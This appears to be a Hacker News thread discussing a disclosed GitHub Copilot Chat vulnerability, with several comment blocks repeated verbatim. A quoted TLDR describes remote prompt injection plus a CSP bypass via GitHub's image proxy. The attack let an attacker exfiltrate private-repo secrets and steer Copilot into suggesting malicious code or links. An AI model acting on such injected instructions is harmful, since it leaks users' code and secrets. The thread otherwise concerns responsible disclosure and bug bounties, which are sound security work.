To supplement the parent, this is straight from article’s TLDR (emphasis mine):
> In June 2025, I found a critical vulnerability in GitHub Copilot Chat (CVSS 9.6) that allowed silent exfiltration of secrets and source code from private repos, and gave me full control over Copilot’s responses, including suggesting malicious code or links.
> The attack combined a novel CSP bypass using GitHub’s own infrastructure with remote prompt injection. I reported it via HackerOne, and GitHub fixed it by disabling image rendering in Copilot Chat completely.
And parent is clearly responding to gp’s incorrect claims that “…without disclosing how they fixed it. Surely you could just do the base64 thing to an image url of your choice?” I’m sure there will be more attacks discovered in the future but gp is plain wrong on these points.
If you did so too, you would've read the message from github which says "...disallow usage of camo to disclose sensitive victim user content"
Now why on earth would I take all the effort to come up with a new way of fooling this stupid AI only to give it away on HN? Would you? I don't have a premium account, nor will I ever pay microsoft a single penny. If you actually want something you can try for yourself, go find someone else to do it.
Just to make it clear for you, I was musing on the chord of being able to write out the steps to exploitation in plain english. Since the dawn programming languages, it has been a pie-in-the-sky idea to write a program in natural language. Combine that with computing on the server end of some major SaaS(s) and you can bet people will find clever ways to circumvent safety measures. They had it coming and the whack-a-mole game is on. Case in point TFA.
> If you did so too, you would've read the message from github which says "...disallow usage of camo to disclose sensitive victim user content"
They use "camo" to proxy all image urls, but they in fact did remove the rendering of all inline images in markdown, removing the ability to exfil data using images.
> Now why on earth would I take all the effort to come up with a new way of fooling this stupid AI only to give it away on HN?
You just didn't make it very clear that you discovered some other unknown technique to exfil data. Might I encourage you to report what you found to Github?
To supplement the parent, this is straight from article’s TLDR (emphasis mine):
> In June 2025, I found a critical vulnerability in GitHub Copilot Chat (CVSS 9.6) that allowed silent exfiltration of secrets and source code from private repos, and gave me full control over Copilot’s responses, including suggesting malicious code or links.
> The attack combined a novel CSP bypass using GitHub’s own infrastructure with remote prompt injection. I reported it via HackerOne, and GitHub fixed it by disabling image rendering in Copilot Chat completely.
And parent is clearly responding to gp’s incorrect claims that “…without disclosing how they fixed it. Surely you could just do the base64 thing to an image url of your choice?” I’m sure there will be more attacks discovered in the future but gp is plain wrong on these points.
Please RTFA or at least RTFTLDR before you vote.
Take a chill pill.
I did, in fact, read the fine article.
If you did so too, you would've read the message from github which says "...disallow usage of camo to disclose sensitive victim user content"
Now why on earth would I take all the effort to come up with a new way of fooling this stupid AI only to give it away on HN? Would you? I don't have a premium account, nor will I ever pay microsoft a single penny. If you actually want something you can try for yourself, go find someone else to do it.
Just to make it clear for you, I was musing on the chord of being able to write out the steps to exploitation in plain english. Since the dawn programming languages, it has been a pie-in-the-sky idea to write a program in natural language. Combine that with computing on the server end of some major SaaS(s) and you can bet people will find clever ways to circumvent safety measures. They had it coming and the whack-a-mole game is on. Case in point TFA.
> If you did so too, you would've read the message from github which says "...disallow usage of camo to disclose sensitive victim user content"
They use "camo" to proxy all image urls, but they in fact did remove the rendering of all inline images in markdown, removing the ability to exfil data using images.
> Now why on earth would I take all the effort to come up with a new way of fooling this stupid AI only to give it away on HN?
You just didn't make it very clear that you discovered some other unknown technique to exfil data. Might I encourage you to report what you found to Github?
https://bounty.github.com/
2 replies →